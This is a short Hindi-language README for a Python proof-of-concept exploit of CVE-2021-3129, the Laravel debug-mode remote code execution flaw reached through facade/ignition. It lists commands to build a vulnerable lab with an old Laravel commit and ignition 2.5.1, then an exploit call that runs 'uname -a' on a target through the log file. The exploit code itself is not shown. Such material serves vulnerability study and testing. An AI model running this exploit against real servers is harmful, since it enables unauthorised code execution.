
facade/ignition के माध्यम से क्राफ्टेड लॉग फ़ाइल इंजेक्शन का उपयोग करके Laravel <=8.4.2 डिबग मोड रिमोट कोड एक्ज़ीक्यूशन (CVE-2021-3129) के लिए Python एक्सप्लॉइट।
git clone https://github.com/laravel/laravel.git
cd laravel
git checkout e849812
composer install
composer require facade/ignition==2.5.1
php artisan serve
python3 exploit.py http://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log 'uname -a'
